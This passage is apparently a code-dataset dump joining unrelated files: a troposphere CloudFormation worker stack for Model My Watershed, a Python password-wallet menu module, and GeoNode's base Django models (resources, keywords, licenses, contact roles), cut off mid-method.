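# Illustrative usage sketch (puzzle layout invented): "blacks" marks black
# squares with "1", "values" gives known digits or "0" for empty squares.
#   test = {"blacks": "0" * 81, "values": "0" * 81}
#   f = Field(test)
#   solved = f.solve()   # True only if constraint propagation fully solves it
#   f.show_hints()       # prints the remaining candidate digits per square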
| gpl-3.0 | -2,845,258,074,390,722,000 | 31.945652 | 112 | 0.466678 | false |
lliss/model-my-watershed | deployment/cfn/worker.py | 1 | 15672 | from troposphere import (
Parameter,
Ref,
Output,
Tags,
GetAtt,
Base64,
Join,
Equals,
cloudwatch as cw,
ec2,
elasticloadbalancing as elb,
autoscaling as asg,
route53 as r53
)
from utils.cfn import get_recent_ami
from utils.constants import (
ALLOW_ALL_CIDR,
EC2_INSTANCE_TYPES,
GRAPHITE,
HTTP,
HTTPS,
POSTGRESQL,
REDIS,
RELP,
SSH,
STATSITE,
VPC_CIDR
)
from majorkirby import StackNode, MKUnresolvableInputError
class Worker(StackNode):
INPUTS = {
'Tags': ['global:Tags'],
'Region': ['global:Region'],
'StackType': ['global:StackType'],
'StackColor': ['global:StackColor'],
'KeyName': ['global:KeyName'],
'IPAccess': ['global:IPAccess'],
'AvailabilityZones': ['global:AvailabilityZones',
'VPC:AvailabilityZones'],
'RDSPassword': ['global:RDSPassword', 'DataPlane:RDSPassword'],
'WorkerInstanceType': ['global:WorkerInstanceType'],
'WorkerAMI': ['global:WorkerAMI'],
'WorkerInstanceProfile': ['global:WorkerInstanceProfile'],
'WorkerAutoScalingDesired': ['global:WorkerAutoScalingDesired'], # NOQA
'WorkerAutoScalingMin': ['global:WorkerAutoScalingMin'],
'WorkerAutoScalingMax': ['global:WorkerAutoScalingMax'],
'PublicSubnets': ['global:PublicSubnets', 'VPC:PublicSubnets'],
'PrivateSubnets': ['global:PrivateSubnets', 'VPC:PrivateSubnets'],
'PublicHostedZoneName': ['global:PublicHostedZoneName'],
'VpcId': ['global:VpcId', 'VPC:VpcId'],
'GlobalNotificationsARN': ['global:GlobalNotificationsARN'],
}
DEFAULTS = {
'Tags': {},
'Region': 'us-east-1',
'StackType': 'Staging',
'StackColor': 'Green',
'KeyName': 'mmw-stg',
'IPAccess': ALLOW_ALL_CIDR,
'WorkerInstanceType': 't2.micro',
'WorkerInstanceProfile': 'WorkerInstanceProfile',
'WorkerAutoScalingDesired': '1',
'WorkerAutoScalingMin': '1',
'WorkerAutoScalingMax': '1',
}
ATTRIBUTES = {
'StackType': 'StackType',
'StackColor': 'StackColor',
}
def set_up_stack(self):
super(Worker, self).set_up_stack()
tags = self.get_input('Tags').copy()
tags.update({'StackType': 'Worker'})
self.default_tags = tags
self.region = self.get_input('Region')
self.add_description('Worker stack for MMW')
# Parameters
self.color = self.add_parameter(Parameter(
'StackColor', Type='String',
Description='Stack color', AllowedValues=['Blue', 'Green']
), 'StackColor')
self.keyname = self.add_parameter(Parameter(
'KeyName', Type='String',
Description='Name of an existing EC2 key pair'
), 'KeyName')
self.ip_access = self.add_parameter(Parameter(
'IPAccess', Type='String', Default=self.get_input('IPAccess'),
Description='CIDR for allowing SSH access'
), 'IPAccess')
self.availability_zones = self.add_parameter(Parameter(
'AvailabilityZones', Type='CommaDelimitedList',
Description='Comma delimited list of availability zones'
), 'AvailabilityZones')
self.rds_password = self.add_parameter(Parameter(
'RDSPassword', Type='String', NoEcho=True,
Description='Database password',
), 'RDSPassword')
self.worker_instance_type = self.add_parameter(Parameter(
'WorkerInstanceType', Type='String', Default='t2.micro',
Description='Worker EC2 instance type',
AllowedValues=EC2_INSTANCE_TYPES,
ConstraintDescription='must be a valid EC2 instance type.'
), 'WorkerInstanceType')
self.worker_ami = self.add_parameter(Parameter(
'WorkerAMI', Type='String',
Default=self.get_recent_worker_ami(),
Description='Worker AMI'
), 'WorkerAMI')
self.worker_instance_profile = self.add_parameter(Parameter(
'WorkerInstanceProfile', Type='String',
Default='WorkerInstanceProfile',
Description='Worker instance profile'
), 'WorkerInstanceProfile')
self.worker_auto_scaling_desired = self.add_parameter(Parameter(
'WorkerAutoScalingDesired', Type='String', Default='1',
Description='Worker AutoScalingGroup desired'
), 'WorkerAutoScalingDesired')
self.worker_auto_scaling_min = self.add_parameter(Parameter(
'WorkerAutoScalingMin', Type='String', Default='1',
Description='Worker AutoScalingGroup minimum'
), 'WorkerAutoScalingMin')
self.worker_auto_scaling_max = self.add_parameter(Parameter(
'WorkerAutoScalingMax', Type='String', Default='1',
Description='Worker AutoScalingGroup maximum'
), 'WorkerAutoScalingMax')
self.public_subnets = self.add_parameter(Parameter(
'PublicSubnets', Type='CommaDelimitedList',
Description='A list of public subnets'
), 'PublicSubnets')
self.private_subnets = self.add_parameter(Parameter(
'PrivateSubnets', Type='CommaDelimitedList',
Description='A list of private subnets'
), 'PrivateSubnets')
self.public_hosted_zone_name = self.add_parameter(Parameter(
'PublicHostedZoneName', Type='String',
Description='Route 53 public hosted zone name'
), 'PublicHostedZoneName')
self.vpc_id = self.add_parameter(Parameter(
'VpcId', Type='String',
Description='VPC ID'
), 'VpcId')
self.notification_topic_arn = self.add_parameter(Parameter(
'GlobalNotificationsARN', Type='String',
Description='ARN for an SNS topic to broadcast notifications'
), 'GlobalNotificationsARN')
worker_lb_security_group, \
worker_security_group = self.create_security_groups()
worker_lb = self.create_load_balancer(worker_lb_security_group)
worker_auto_scaling_group = self.create_auto_scaling_resources(
worker_security_group,
worker_lb)
self.create_cloud_watch_resources(worker_auto_scaling_group)
self.create_dns_records(worker_lb)
self.add_output(Output('WorkerLoadBalancerEndpoint',
Value=GetAtt(worker_lb, 'DNSName')))
self.add_output(Output('WorkerLoadBalancerHostedZoneNameID',
Value=GetAtt(worker_lb,
'CanonicalHostedZoneNameID')))
def get_recent_worker_ami(self):
try:
worker_ami_id = self.get_input('WorkerAMI')
except MKUnresolvableInputError:
worker_ami_id = get_recent_ami(self.aws_profile,
'mmw-worker-*')
return worker_ami_id
def create_security_groups(self):
worker_lb_security_group_name = 'sgWorkerLoadBalancer'
worker_lb_security_group = self.add_resource(ec2.SecurityGroup(
worker_lb_security_group_name,
GroupDescription='Enables access to workers via a load balancer',
VpcId=Ref(self.vpc_id),
SecurityGroupIngress=[
ec2.SecurityGroupRule(
IpProtocol='tcp', CidrIp=Ref(self.ip_access), FromPort=p,
ToPort=p
)
for p in [HTTP]
],
SecurityGroupEgress=[
ec2.SecurityGroupRule(
IpProtocol='tcp', CidrIp=VPC_CIDR, FromPort=p, ToPort=p
)
for p in [HTTP]
],
Tags=self.get_tags(Name=worker_lb_security_group_name)
))
worker_security_group_name = 'sgWorker'
worker_security_group = self.add_resource(ec2.SecurityGroup(
worker_security_group_name,
GroupDescription='Enables access to workers',
VpcId=Ref(self.vpc_id),
SecurityGroupIngress=[
ec2.SecurityGroupRule(
IpProtocol='tcp', CidrIp=VPC_CIDR, FromPort=p, ToPort=p
)
for p in [SSH, HTTP]
] + [
ec2.SecurityGroupRule(
IpProtocol='tcp', SourceSecurityGroupId=Ref(sg),
FromPort=HTTP, ToPort=HTTP
)
for sg in [worker_lb_security_group]
],
SecurityGroupEgress=[
ec2.SecurityGroupRule(
IpProtocol='tcp', CidrIp=VPC_CIDR, FromPort=p, ToPort=p
)
for p in [GRAPHITE, POSTGRESQL, REDIS, STATSITE, RELP]
] + [
ec2.SecurityGroupRule(
IpProtocol='udp', CidrIp=VPC_CIDR, FromPort=p, ToPort=p
)
for p in [STATSITE]
] + [
ec2.SecurityGroupRule(
IpProtocol='tcp', CidrIp=ALLOW_ALL_CIDR, FromPort=p,
ToPort=p
)
for p in [HTTP, HTTPS]
],
Tags=self.get_tags(Name=worker_security_group_name)
))
return worker_lb_security_group, worker_security_group
def create_load_balancer(self, worker_lb_security_group):
worker_lb_name = 'elbWorker'
return self.add_resource(elb.LoadBalancer(
worker_lb_name,
ConnectionDrainingPolicy=elb.ConnectionDrainingPolicy(
Enabled=True,
Timeout=300,
),
CrossZone=True,
SecurityGroups=[Ref(worker_lb_security_group)],
Listeners=[
elb.Listener(
LoadBalancerPort='80',
InstancePort='80',
Protocol='HTTP',
)
],
HealthCheck=elb.HealthCheck(
Target='HTTP:80/',
HealthyThreshold='3',
UnhealthyThreshold='2',
Interval='60',
Timeout='10',
),
Subnets=Ref(self.public_subnets),
Tags=self.get_tags(Name=worker_lb_name)
))
def create_auto_scaling_resources(self, worker_security_group, worker_lb):
worker_launch_config_name = 'lcWorker'
worker_launch_config = self.add_resource(
asg.LaunchConfiguration(
worker_launch_config_name,
ImageId=Ref(self.worker_ami),
IamInstanceProfile=Ref(self.worker_instance_profile),
InstanceType=Ref(self.worker_instance_type),
KeyName=Ref(self.keyname),
SecurityGroups=[Ref(worker_security_group)],
UserData=Base64(
Join('', self.get_cloud_config()))
))
worker_auto_scaling_group_name = 'asgWorker'
return self.add_resource(
asg.AutoScalingGroup(
worker_auto_scaling_group_name,
AvailabilityZones=Ref(self.availability_zones),
Cooldown=300,
DesiredCapacity=Ref(self.worker_auto_scaling_desired),
HealthCheckGracePeriod=600,
HealthCheckType='ELB',
LaunchConfigurationName=Ref(worker_launch_config),
LoadBalancerNames=[Ref(worker_lb)],
MaxSize=Ref(self.worker_auto_scaling_max),
MinSize=Ref(self.worker_auto_scaling_min),
NotificationConfigurations=[
asg.NotificationConfigurations(
TopicARN=Ref(self.notification_topic_arn),
NotificationTypes=[
asg.EC2_INSTANCE_LAUNCH,
asg.EC2_INSTANCE_LAUNCH_ERROR,
asg.EC2_INSTANCE_TERMINATE,
asg.EC2_INSTANCE_TERMINATE_ERROR
]
)
],
VPCZoneIdentifier=Ref(self.private_subnets),
Tags=[asg.Tag('Name', 'Worker', True)]
)
)
def get_cloud_config(self):
return ['#cloud-config\n',
'\n',
'mounts:\n',
' - [xvdf, /opt/rwd-data, ext4, "defaults,nofail,discard", 0, 2]\n'
'\n',
'write_files:\n',
' - path: /etc/mmw.d/env/MMW_STACK_COLOR\n',
' permissions: 0750\n',
' owner: root:mmw\n',
' content: ', Ref(self.color), '\n',
' - path: /etc/mmw.d/env/MMW_DB_PASSWORD\n',
' permissions: 0750\n',
' owner: root:mmw\n',
' content: ', Ref(self.rds_password)]
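    # Illustrative rendering of the user data above (values are examples; the
    # Ref() placeholders are resolved by CloudFormation when the instance
    # launches):
    #
    #   #cloud-config
    #
    #   mounts:
    #     - [xvdf, /opt/rwd-data, ext4, "defaults,nofail,discard", 0, 2]
    #
    #   write_files:
    #     - path: /etc/mmw.d/env/MMW_STACK_COLOR
    #       permissions: 0750
    #       owner: root:mmw
    #       content: Green
    #     - path: /etc/mmw.d/env/MMW_DB_PASSWORD
    #       permissions: 0750
    #       owner: root:mmw
    #       content: <rds-password>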
def create_cloud_watch_resources(self, worker_auto_scaling_group):
self.add_resource(cw.Alarm(
'alarmWorkerCPU',
AlarmDescription='Worker scaling group high CPU',
AlarmActions=[Ref(self.notification_topic_arn)],
Statistic='Average',
Period=300,
Threshold='50',
EvaluationPeriods=1,
ComparisonOperator='GreaterThanThreshold',
MetricName='CPUUtilization',
Namespace='AWS/EC2',
Dimensions=[
cw.MetricDimension(
'metricAutoScalingGroupName',
Name='AutoScalingGroupName',
Value=Ref(worker_auto_scaling_group)
)
]
))
def create_dns_records(self, worker_lb):
self.add_condition('BlueCondition', Equals('Blue', Ref(self.color)))
self.add_condition('GreenCondition', Equals('Green', Ref(self.color)))
self.add_resource(r53.RecordSetGroup(
'dnsPublicRecordsBlue',
Condition='BlueCondition',
HostedZoneName=Join('', [Ref(self.public_hosted_zone_name), '.']),
RecordSets=[
r53.RecordSet(
'dnsTileServersBlue',
AliasTarget=r53.AliasTarget(
GetAtt(worker_lb, 'CanonicalHostedZoneNameID'),
GetAtt(worker_lb, 'DNSName'),
True
),
Name=Join('', ['blue-workers.',
Ref(self.public_hosted_zone_name), '.']),
Type='A'
)
]
))
self.add_resource(r53.RecordSetGroup(
'dnsPublicRecordsGreen',
Condition='GreenCondition',
HostedZoneName=Join('', [Ref(self.public_hosted_zone_name), '.']),
RecordSets=[
r53.RecordSet(
'dnsTileServersGreen',
AliasTarget=r53.AliasTarget(
GetAtt(worker_lb, 'CanonicalHostedZoneNameID'),
GetAtt(worker_lb, 'DNSName'),
True
),
Name=Join('', ['green-workers.',
Ref(self.public_hosted_zone_name), '.']),
Type='A'
)
]
))
def get_tags(self, **kwargs):
"""Helper method to return Troposphere tags + default tags
Args:
**kwargs: arbitrary keyword arguments to be used as tags
"""
kwargs.update(self.default_tags)
return Tags(**kwargs)
| apache-2.0 | -5,937,930,016,655,273,000 | 35.875294 | 84 | 0.540327 | false |
hashtag1138/pass_wallet | menutrousseau.py | 1 | 2983 | from error_handler import MyError, ErrorScreen0
from menu import Menu
import os, time
class Trousseau0(Menu):
def __init__(self, parent):
super().__init__(parent)
self.entrees = None
self.selected = 0
def loadPasswordList(self):
try:
# --- Open ---
conf_file = open('config.txt', 'r')
line = conf_file.readline()
# --- Read ---
while ( "password_directory=" not in line) and len(line)>0: #Lecture
line = conf_file.readline()
# --- Search option ---
if not "password_directory=" in line :
raise MyError("Password_directory not found in config.txt")
# --- Extract path value ---
start = line.find("=") + 1
if start == 0 :
raise MyError(" '=' not found in : " + line)
end = line.find(";")
if end == -1 :
raise MyError(" ';' not found in : " + line)
password_path = line[start:end]
if not os.path.exists(password_path):
raise MyError(password_path + " not found")
pass_list = []
for filename in os.listdir(password_path):
pass_file = open(password_path+'/'+filename, 'r')
content = pass_file.readline()
pass_list.append({'name': filename, 'submenu':
Password(self, titre=filename, encrypted=content)})
return pass_list
except Exception as e:
print(e)
return [{'name' : '0 mot de passe', 'submenu' : ErrorScreen0(self, e)}]
def display(self, key, display):
# --- Loading Passwords ---
if not self.entrees:
self.entrees = self.loadPasswordList()
# --- Rendering ---
self.printList(display, self.selected, self.entrees)
# --- User's Inputs ---
return self.selectMenu(key, display)
class Password(Menu):
def __init__(self, parent, titre=None, encrypted=None):
super().__init__(parent)
self.titre = titre
self.encrypted = encrypted
self.decrypted = None
self.menu_unlock = Unlock0(self)
self.menu_play = Play0(self)
self.menu_modify = Modify0(self)
def display(self, key, display):
# --- User's Inputs ---
if key == '0' :
display.clear()
return self.parent
# --- Rendering ---
display.println(self.titre)
display.println(self.encrypted)
return self
class Unlock0(Menu):
def __init__(self, parent):
super().__init__(parent)
def display(self, key, display):
# --- User's Inputs ---
display.clear()
if key == '0' :
display.clear()
return self.parent
# --- Rendering ---
display.println("Unlock0")
return self
class Play0(Menu):
def __init__(self, parent):
super().__init__(parent)
def display(self, key, display):
# --- User's Inputs ---
if key == '0' :
display.clear()
return self.parent
# --- Rendering ---
display.println("Play0")
return self
class Modify0(Menu):
def __init__(self, parent):
super().__init__(parent)
def display(self, key, display):
# --- User's Inputs ---
if key == '0' :
display.clear()
return self.parent
# --- Rendering ---
display.println("Modify0")
return self
| gpl-3.0 | -3,663,898,111,024,548,400 | 22.864 | 74 | 0.610795 | false |
terranodo/geonode | geonode/base/models.py | 1 | 34374 | # -*- coding: utf-8 -*-
#########################################################################
#
# Copyright (C) 2016 OSGeo
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#########################################################################
import datetime
import math
import os
import logging
from pyproj import transform, Proj
from urlparse import urljoin, urlsplit
from django.db import models
from django.core import serializers
from django.db.models import Q
from django.utils.translation import ugettext_lazy as _
from django.core.exceptions import ValidationError
from django.conf import settings
from django.contrib.staticfiles.templatetags import staticfiles
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth import get_user_model
from django.db.models import signals
from django.core.files.storage import default_storage as storage
from django.core.files.base import ContentFile
from mptt.models import MPTTModel, TreeForeignKey
from polymorphic.models import PolymorphicModel
from polymorphic.managers import PolymorphicManager
from agon_ratings.models import OverallRating
from geonode.base.enumerations import ALL_LANGUAGES, \
HIERARCHY_LEVELS, UPDATE_FREQUENCIES, \
DEFAULT_SUPPLEMENTAL_INFORMATION, LINK_TYPES
from geonode.utils import bbox_to_wkt
from geonode.utils import forward_mercator
from geonode.security.models import PermissionLevelMixin
from taggit.managers import TaggableManager, _TaggableManager
from taggit.models import TagBase, ItemBase
from treebeard.mp_tree import MP_Node
from geonode.people.enumerations import ROLE_VALUES
logger = logging.getLogger(__name__)
class ContactRole(models.Model):
"""
ContactRole is an intermediate model to bind Profiles as Contacts to Resources and apply roles.
"""
resource = models.ForeignKey('ResourceBase')
contact = models.ForeignKey(settings.AUTH_USER_MODEL)
role = models.CharField(choices=ROLE_VALUES, max_length=255, help_text=_('function performed by the responsible '
'party'))
def clean(self):
"""
Make sure there is only one poc and author per resource
"""
if (self.role == self.resource.poc_role) or (self.role == self.resource.metadata_author_role):
contacts = self.resource.contacts.filter(contactrole__role=self.role)
if contacts.count() == 1:
# only allow this if we are updating the same contact
if self.contact != contacts.get():
raise ValidationError('There can be only one %s for a given resource' % self.role)
if self.contact.user is None:
# verify that any unbound contact is only associated to one resource
bounds = ContactRole.objects.filter(contact=self.contact).count()
if bounds > 1:
                raise ValidationError('There can be one and only one resource linked to an unbound contact')
elif bounds == 1:
# verify that if there was one already, it corresponds to this instance
if ContactRole.objects.filter(contact=self.contact).get().id != self.id:
                    raise ValidationError('There can be one and only one resource linked to an unbound contact')
class Meta:
unique_together = (("contact", "resource", "role"),)
class TopicCategory(models.Model):
"""
Metadata about high-level geographic data thematic classification.
It should reflect a list of codes from TC211
See: http://www.isotc211.org/2005/resources/Codelist/gmxCodelists.xml
<CodeListDictionary gml:id="MD_MD_TopicCategoryCode">
"""
identifier = models.CharField(max_length=255, default='location')
description = models.TextField(default='')
gn_description = models.TextField('GeoNode description', default='', null=True)
is_choice = models.BooleanField(default=True)
fa_class = models.CharField(max_length=64, default='fa-times')
def __unicode__(self):
return u"{0}".format(self.gn_description)
class Meta:
ordering = ("identifier",)
verbose_name_plural = 'Metadata Topic Categories'
class SpatialRepresentationType(models.Model):
"""
Metadata information about the spatial representation type.
It should reflect a list of codes from TC211
See: http://www.isotc211.org/2005/resources/Codelist/gmxCodelists.xml
<CodeListDictionary gml:id="MD_SpatialRepresentationTypeCode">
"""
identifier = models.CharField(max_length=255, editable=False)
description = models.CharField(max_length=255, editable=False)
gn_description = models.CharField('GeoNode description', max_length=255)
is_choice = models.BooleanField(default=True)
def __unicode__(self):
return self.gn_description
class Meta:
ordering = ("identifier",)
verbose_name_plural = 'Metadata Spatial Representation Types'
class RegionManager(models.Manager):
def get_by_natural_key(self, code):
return self.get(code=code)
class Region(MPTTModel):
# objects = RegionManager()
code = models.CharField(max_length=50, unique=True)
name = models.CharField(max_length=255)
parent = TreeForeignKey('self', null=True, blank=True, related_name='children')
def __unicode__(self):
return self.name
class Meta:
ordering = ("name",)
verbose_name_plural = 'Metadata Regions'
class MPTTMeta:
order_insertion_by = ['name']
class RestrictionCodeType(models.Model):
"""
Metadata information about the spatial representation type.
It should reflect a list of codes from TC211
See: http://www.isotc211.org/2005/resources/Codelist/gmxCodelists.xml
<CodeListDictionary gml:id="MD_RestrictionCode">
"""
identifier = models.CharField(max_length=255, editable=False)
description = models.TextField(max_length=255, editable=False)
gn_description = models.TextField('GeoNode description', max_length=255)
is_choice = models.BooleanField(default=True)
def __unicode__(self):
return self.gn_description
class Meta:
ordering = ("identifier",)
verbose_name_plural = 'Metadata Restriction Code Types'
class License(models.Model):
identifier = models.CharField(max_length=255, editable=False)
name = models.CharField(max_length=100)
abbreviation = models.CharField(max_length=20, null=True, blank=True)
description = models.TextField(null=True, blank=True)
url = models.URLField(max_length=2000, null=True, blank=True)
license_text = models.TextField(null=True, blank=True)
def __unicode__(self):
return self.name
@property
def name_long(self):
if self.abbreviation is None or len(self.abbreviation) == 0:
return self.name
else:
return self.name+" ("+self.abbreviation+")"
@property
def description_bullets(self):
if self.description is None or len(self.description) == 0:
return ""
else:
bullets = []
lines = self.description.split("\n")
for line in lines:
bullets.append("+ "+line)
return bullets
class Meta:
ordering = ("name", )
verbose_name_plural = 'Licenses'
class HierarchicalKeyword(TagBase, MP_Node):
node_order_by = ['name']
@classmethod
def dump_bulk_tree(cls, parent=None, keep_ids=True):
"""Dumps a tree branch to a python data structure."""
qset = cls._get_serializable_model().get_tree(parent)
ret, lnk = [], {}
for pyobj in qset:
serobj = serializers.serialize('python', [pyobj])[0]
# django's serializer stores the attributes in 'fields'
fields = serobj['fields']
depth = fields['depth']
fields['text'] = fields['name']
fields['href'] = fields['slug']
del fields['name']
del fields['slug']
del fields['path']
del fields['numchild']
del fields['depth']
if 'id' in fields:
# this happens immediately after a load_bulk
del fields['id']
newobj = {}
for field in fields:
newobj[field] = fields[field]
if keep_ids:
newobj['id'] = serobj['pk']
if (not parent and depth == 1) or\
(parent and depth == parent.depth):
ret.append(newobj)
else:
parentobj = pyobj.get_parent()
parentser = lnk[parentobj.pk]
if 'nodes' not in parentser:
parentser['nodes'] = []
parentser['nodes'].append(newobj)
lnk[pyobj.pk] = newobj
return ret
class TaggedContentItem(ItemBase):
content_object = models.ForeignKey('ResourceBase')
tag = models.ForeignKey('HierarchicalKeyword', related_name='keywords')
# see https://github.com/alex/django-taggit/issues/101
@classmethod
def tags_for(cls, model, instance=None):
if instance is not None:
return cls.tag_model().objects.filter(**{
'%s__content_object' % cls.tag_relname(): instance
})
return cls.tag_model().objects.filter(**{
'%s__content_object__isnull' % cls.tag_relname(): False
}).distinct()
class _HierarchicalTagManager(_TaggableManager):
def add(self, *tags):
str_tags = set([
t
for t in tags
if not isinstance(t, self.through.tag_model())
])
tag_objs = set(tags) - str_tags
# If str_tags has 0 elements Django actually optimizes that to not do a
# query. Malcolm is very smart.
existing = self.through.tag_model().objects.filter(
slug__in=str_tags
)
tag_objs.update(existing)
for new_tag in str_tags - set(t.slug for t in existing):
tag_objs.add(HierarchicalKeyword.add_root(name=new_tag))
for tag in tag_objs:
self.through.objects.get_or_create(tag=tag, **self._lookup_kwargs())
class ResourceBaseManager(PolymorphicManager):
def admin_contact(self):
# this assumes there is at least one superuser
superusers = get_user_model().objects.filter(is_superuser=True).order_by('id')
if superusers.count() == 0:
raise RuntimeError('GeoNode needs at least one admin/superuser set')
return superusers[0]
def get_queryset(self):
return super(ResourceBaseManager, self).get_queryset().non_polymorphic()
def polymorphic_queryset(self):
return super(ResourceBaseManager, self).get_queryset()
class ResourceBase(PolymorphicModel, PermissionLevelMixin, ItemBase):
"""
Base Resource Object loosely based on ISO 19115:2003
"""
VALID_DATE_TYPES = [(x.lower(), _(x)) for x in ['Creation', 'Publication', 'Revision']]
date_help_text = _('reference date for the cited resource')
date_type_help_text = _('identification of when a given event occurred')
edition_help_text = _('version of the cited resource')
abstract_help_text = _('brief narrative summary of the content of the resource(s)')
purpose_help_text = _('summary of the intentions with which the resource(s) was developed')
maintenance_frequency_help_text = _('frequency with which modifications and deletions are made to the data after '
'it is first produced')
keywords_help_text = _('commonly used word(s) or formalised word(s) or phrase(s) used to describe the subject '
                           '(space or comma-separated)')
regions_help_text = _('keyword identifies a location')
restriction_code_type_help_text = _('limitation(s) placed upon the access or use of the data.')
constraints_other_help_text = _('other restrictions and legal prerequisites for accessing and using the resource or'
' metadata')
license_help_text = _('license of the dataset')
language_help_text = _('language used within the dataset')
category_help_text = _('high-level geographic data thematic classification to assist in the grouping and search of '
'available geographic data sets.')
spatial_representation_type_help_text = _('method used to represent geographic information in the dataset.')
temporal_extent_start_help_text = _('time period covered by the content of the dataset (start)')
temporal_extent_end_help_text = _('time period covered by the content of the dataset (end)')
data_quality_statement_help_text = _('general explanation of the data producer\'s knowledge about the lineage of a'
' dataset')
# internal fields
uuid = models.CharField(max_length=36)
owner = models.ForeignKey(settings.AUTH_USER_MODEL, blank=True, null=True, related_name='owned_resource',
verbose_name=_("Owner"))
contacts = models.ManyToManyField(settings.AUTH_USER_MODEL, through='ContactRole')
title = models.CharField(_('title'), max_length=255, help_text=_('name by which the cited resource is known'))
date = models.DateTimeField(_('date'), default=datetime.datetime.now, help_text=date_help_text)
date_type = models.CharField(_('date type'), max_length=255, choices=VALID_DATE_TYPES, default='publication',
help_text=date_type_help_text)
edition = models.CharField(_('edition'), max_length=255, blank=True, null=True, help_text=edition_help_text)
abstract = models.TextField(_('abstract'), blank=True, help_text=abstract_help_text)
purpose = models.TextField(_('purpose'), null=True, blank=True, help_text=purpose_help_text)
maintenance_frequency = models.CharField(_('maintenance frequency'), max_length=255, choices=UPDATE_FREQUENCIES,
blank=True, null=True, help_text=maintenance_frequency_help_text)
keywords = TaggableManager(_('keywords'), through=TaggedContentItem, blank=True, help_text=keywords_help_text,
manager=_HierarchicalTagManager)
regions = models.ManyToManyField(Region, verbose_name=_('keywords region'), blank=True,
help_text=regions_help_text)
restriction_code_type = models.ForeignKey(RestrictionCodeType, verbose_name=_('restrictions'),
help_text=restriction_code_type_help_text, null=True, blank=True,
limit_choices_to=Q(is_choice=True))
constraints_other = models.TextField(_('restrictions other'), blank=True, null=True,
help_text=constraints_other_help_text)
license = models.ForeignKey(License, null=True, blank=True,
verbose_name=_("License"),
help_text=license_help_text)
language = models.CharField(_('language'), max_length=3, choices=ALL_LANGUAGES, default='eng',
help_text=language_help_text)
category = models.ForeignKey(TopicCategory, null=True, blank=True, limit_choices_to=Q(is_choice=True),
help_text=category_help_text)
spatial_representation_type = models.ForeignKey(SpatialRepresentationType, null=True, blank=True,
limit_choices_to=Q(is_choice=True),
verbose_name=_("spatial representation type"),
help_text=spatial_representation_type_help_text)
# Section 5
temporal_extent_start = models.DateTimeField(_('temporal extent start'), blank=True, null=True,
help_text=temporal_extent_start_help_text)
temporal_extent_end = models.DateTimeField(_('temporal extent end'), blank=True, null=True,
help_text=temporal_extent_end_help_text)
supplemental_information = models.TextField(_('supplemental information'), default=DEFAULT_SUPPLEMENTAL_INFORMATION,
help_text=_('any other descriptive information about the dataset'))
# Section 8
data_quality_statement = models.TextField(_('data quality statement'), blank=True, null=True,
help_text=data_quality_statement_help_text)
# Section 9
# see metadata_author property definition below
# Save bbox values in the database.
# This is useful for spatial searches and for generating thumbnail images and metadata records.
bbox_x0 = models.DecimalField(max_digits=19, decimal_places=10, blank=True, null=True)
bbox_x1 = models.DecimalField(max_digits=19, decimal_places=10, blank=True, null=True)
bbox_y0 = models.DecimalField(max_digits=19, decimal_places=10, blank=True, null=True)
bbox_y1 = models.DecimalField(max_digits=19, decimal_places=10, blank=True, null=True)
srid = models.CharField(max_length=255, default='EPSG:4326')
# CSW specific fields
csw_typename = models.CharField(_('CSW typename'), max_length=32, default='gmd:MD_Metadata', null=False)
csw_schema = models.CharField(_('CSW schema'),
max_length=64,
default='http://www.isotc211.org/2005/gmd',
null=False)
csw_mdsource = models.CharField(_('CSW source'), max_length=256, default='local', null=False)
csw_insert_date = models.DateTimeField(_('CSW insert date'), auto_now_add=True, null=True)
csw_type = models.CharField(_('CSW type'), max_length=32, default='dataset', null=False, choices=HIERARCHY_LEVELS)
csw_anytext = models.TextField(_('CSW anytext'), null=True, blank=True)
csw_wkt_geometry = models.TextField(_('CSW WKT geometry'),
null=False,
default='POLYGON((-180 -90,-180 90,180 90,180 -90,-180 -90))')
# metadata XML specific fields
metadata_uploaded = models.BooleanField(default=False)
metadata_uploaded_preserve = models.BooleanField(default=False)
metadata_xml = models.TextField(null=True,
default='<gmd:MD_Metadata xmlns:gmd="http://www.isotc211.org/2005/gmd"/>',
blank=True)
popular_count = models.IntegerField(default=0)
share_count = models.IntegerField(default=0)
featured = models.BooleanField(_("Featured"), default=False,
help_text=_('Should this resource be advertised in home page?'))
is_published = models.BooleanField(_("Is Published"), default=True,
help_text=_('Should this resource be published and searchable?'))
# fields necessary for the apis
thumbnail_url = models.TextField(null=True, blank=True)
detail_url = models.CharField(max_length=255, null=True, blank=True)
rating = models.IntegerField(default=0, null=True, blank=True)
def __unicode__(self):
return self.title
@property
def bbox(self):
return [self.bbox_x0, self.bbox_y0, self.bbox_x1, self.bbox_y1, self.srid]
@property
def bbox_string(self):
return ",".join([str(self.bbox_x0), str(self.bbox_y0), str(self.bbox_x1), str(self.bbox_y1)])
@property
def geographic_bounding_box(self):
return bbox_to_wkt(self.bbox_x0, self.bbox_x1, self.bbox_y0, self.bbox_y1, srid=self.srid)
@property
def license_light(self):
a = []
if (not (self.license.name is None)) and (len(self.license.name) > 0):
a.append(self.license.name)
if (not (self.license.url is None)) and (len(self.license.url) > 0):
a.append("("+self.license.url+")")
return " ".join(a)
@property
def license_verbose(self):
a = []
if (not (self.license.name_long is None)) and (len(self.license.name_long) > 0):
a.append(self.license.name_long+":")
if (not (self.license.description is None)) and (len(self.license.description) > 0):
a.append(self.license.description)
if (not (self.license.url is None)) and (len(self.license.url) > 0):
a.append("("+self.license.url+")")
return " ".join(a)
def keyword_list(self):
return [kw.name for kw in self.keywords.all()]
def keyword_slug_list(self):
return [kw.slug for kw in self.keywords.all()]
def region_name_list(self):
return [region.name for region in self.regions.all()]
def spatial_representation_type_string(self):
if hasattr(self.spatial_representation_type, 'identifier'):
return self.spatial_representation_type.identifier
else:
if hasattr(self, 'storeType'):
if self.storeType == 'coverageStore':
return 'grid'
return 'vector'
else:
return None
@property
def keyword_csv(self):
keywords_qs = self.get_real_instance().keywords.all()
if keywords_qs:
return ','.join([kw.name for kw in keywords_qs])
else:
return ''
def set_latlon_bounds(self, box):
"""
Set the four bounds in lat lon projection
"""
self.bbox_x0 = box[0]
self.bbox_x1 = box[1]
self.bbox_y0 = box[2]
